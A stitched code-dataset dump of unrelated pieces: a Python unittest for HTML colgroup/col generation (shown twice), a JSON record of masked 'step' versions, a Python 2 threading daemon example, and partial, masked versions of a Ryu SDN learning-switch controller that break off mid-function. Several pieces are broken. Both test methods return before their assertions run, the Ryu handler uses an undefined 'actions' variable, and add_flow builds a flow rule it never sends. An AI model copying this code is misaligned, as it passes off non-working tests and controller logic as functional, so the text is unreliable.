'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"colgroup present from generate()"
)
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"colgroup present from generate() with tgroups"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None } ),
"colgroup can be overriden"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': 1 } ),
"colgroup yields no-op if scalar"
)
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),
"can specify multiple colgroups"
)
def test_col(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': {} } ),
"colgroup wraps col"
)
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': [{},{},{}] } ),
"colgroup wraps multiple cols"
)
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None, 'col': {} } ),
"colgroup can be overriden when col is present too"
)
gen = Table( { 'data': data, 'col': [{},{},{}] } );
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': {} } ),
"multiple cols against single colgroup"
)
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),
"no cols against multiple colgroups"
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [{},{},{}] } ),
"multiple cols against multiple colgroups"
)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "24f87bd6aab0ff65cf2153e27df31122818ad0ac",
"index": 766,
"step-1": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n <mask token>\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom Spreadsheet.HTML import Table\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom Spreadsheet.HTML import Table\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate(),\n \"colgroup present from generate()\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',\n gen.generate( { 'tgroups': 2 } ),\n \"colgroup present from generate() with tgroups\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None } ),\n \"colgroup can be overriden\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': 1 } ),\n \"colgroup yields no-op if scalar\"\n )\n\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),\n \"can specify multiple colgroups\"\n )\n\n\n def test_col(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': {} } ),\n \"colgroup wraps col\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': [{},{},{}] } ),\n \"colgroup wraps multiple cols\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None, 'col': {} } ),\n \"colgroup can be overriden when col is present too\"\n )\n\n\n gen = Table( { 'data': data, 'col': [{},{},{}] } );\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': {} } ),\n \"multiple cols against single colgroup\"\n )\n\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),\n \"no cols against multiple colgroups\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [{},{},{}] } ),\n \"multiple cols against multiple colgroups\"\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import threading
import time
def work():
i = 0
while i < 10:
print 'I am working..'
time.sleep(0.5)
i += 1
t = threading.Thread(target=work)
# Daemon 설정
#t.setDaemon(True)
t.daemon = True # 혹인 이렇게도 가능
t.start()
print 'main thread finished'
|
normal
|
{
"blob_id": "f77df47fdb72ba50331b8b5d65984efaec474057",
"index": 4049,
"step-1": "# -*- coding: utf-8 -*-\n\nimport threading\nimport time\n\ndef work():\n i = 0\n while i < 10:\n print 'I am working..'\n time.sleep(0.5)\n i += 1\n\nt = threading.Thread(target=work)\n# Daemon 설정\n#t.setDaemon(True) \nt.daemon = True # 혹인 이렇게도 가능\nt.start()\n\nprint 'main thread finished'\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
print('PACKET_OUT...')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
<|reserved_special_token_0|>
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
